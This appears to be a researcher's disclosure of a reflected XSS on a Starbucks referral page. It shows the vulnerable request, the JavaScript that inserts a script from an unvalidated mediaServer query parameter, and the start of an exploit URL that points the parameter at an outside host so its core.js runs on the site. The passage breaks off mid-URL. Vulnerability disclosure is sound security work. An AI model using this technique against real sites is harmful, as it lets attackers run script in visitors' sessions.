I have found a reflective XSS vulnerability on http://refer.starbucks.com. Below are the details:
- Go to http://happymondays.starbucks.
com, scroll down and click the “Invite a friend” button. You will be redirected to http://refer.starbucks.com/ micro/microsite?source= redirect - On http://refer.starbucks.com/
micro/microsite?source= redirect there are three buttons, to “Spread the love“:
SHARE WITH EMAIL
SHARE ON FACEBOOK
SHARE ON TWITTER
Clicking on each of them generates a request like this:
GET /xd-arbiter?mediaServer=http://tags.extole.com&clientId=106223&socketId=facebook_4 HTTP/1.1
Host: refer.starbucks.com
Use of external server should immediately catch your attention – a quick look into the source code reveals a reflective XSS vulnerability:
var MEDIA_SERVER = queryArgs.mediaServer;
var CLIENT_ID = queryArgs.clientId;
var SOCKET_ID = queryArgs.socketId;
(…)
insertScript(MEDIA_SERVER + ‘/’ + CLIENT_ID + ‘/core.js’);
So we have a MEDIA_SERVER (“https://lubi.cz“), CLIENT_ID (“starbucks” folder), SOCKET_ID (whaterver) and a core.js file (“https://lubi.cz/starbucks/
http://refer.starbucks.com/xd-